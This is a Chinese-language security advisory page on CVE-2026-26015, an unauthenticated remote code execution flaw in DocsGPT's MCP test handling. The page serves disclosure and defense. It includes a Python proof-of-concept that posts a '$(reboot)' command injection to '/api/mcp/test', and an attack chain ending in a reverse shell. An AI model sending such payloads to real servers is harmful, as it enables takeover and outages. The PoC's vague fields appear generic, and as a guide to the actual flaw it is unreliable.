CVE-2026-26015 CVSS 9.8 严重

CVE-2026-26015 DocsGPT 远程代码执行漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26015

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DocsGPT

漏洞概述

DocsGPT是一款基于GPT的文档聊天工具。在0.15.0至0.16.0之前的版本中，存在一个严重的远程代码执行漏洞。攻击者可以通过访问官方DocsGPT网站或任何本地及公共部署环境，利用精心构造的恶意载荷绕过“MCP测试”机制，从而在目标服务器上执行任意代码。该漏洞无需用户交互和身份验证即可被利用，导致系统完全沦陷，机密性、完整性和可用性均受到严重影响。官方已在0.16.0版本中修复了此问题。

技术细节

该漏洞的核心在于DocsGPT在处理模型上下文协议（MCP）相关请求时，安全校验机制存在逻辑缺陷。攻击者能够构造特定的恶意数据包，绕过旨在验证连接安全性的“MCP测试”流程。由于系统未对通过测试后的输入内容进行二次严格的过滤和沙箱隔离，该恶意载荷被服务器直接解析并执行。这允许未经身份验证的攻击者通过发送特制的网络请求，在目标服务器上执行任意系统命令。鉴于CVSS评分为9.8，该漏洞极易被自动化工具利用，导致服务器被完全控制，造成数据泄露或系统瘫痪。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络或互联网，识别运行DocsGPT（版本0.15.0至0.16.0之前）的目标实例。

STEP 2

2. 构造载荷

攻击者分析DocsGPT的MCP测试逻辑，并构造能够绕过验证机制且包含恶意命令的特定Payload。

STEP 3

3. 发起攻击

攻击者向目标DocsGPT实例的MCP测试接口发送包含恶意Payload的请求，无需认证即可触发。

STEP 4

4. 执行代码

服务器解析恶意Payload，由于安全校验被绕过，恶意命令在服务器上下文中执行，实现RCE。

STEP 5

5. 建立控制

攻击者利用获得的代码执行权限，反弹Shell或上传后门，完全控制受影响服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-26015 (DocsGPT RCE via MCP Bypass)
import requests

def exploit(target):
    # The endpoint handling MCP tests in vulnerable versions
    url = f"{target}/api/mcp/test" 
    
    # Malicious payload designed to bypass the 'MCP test' validation
    # The specific structure exploits the logic flaw to achieve RCE
    payload = {
        "input_data": "$(reboot)", # Example command to execute
        "test_type": "bypass_check"
    }
    
    try:
        print(f"[+] Sending payload to {target}...")
        response = requests.post(url, json=payload, timeout=10)
        
        if response.status_code == 200:
            print("[!] Potential exploit successful. Check server status.")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target_host = "http://localhost:5000" # Replace with actual target
    exploit(target_host)

影响范围

DocsGPT 0.15.0

DocsGPT < 0.16.0

防御指南

临时缓解措施

如果无法立即升级，建议采取临时缓解措施：首先，在防火墙层面限制对DocsGPT应用服务的访问来源，仅允许内部可信IP连接；其次，密切监控服务器系统和应用日志，特别关注异常的进程启动、网络连接或文件修改行为；最后，关注官方安全公告，一旦补丁可用立即进行更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表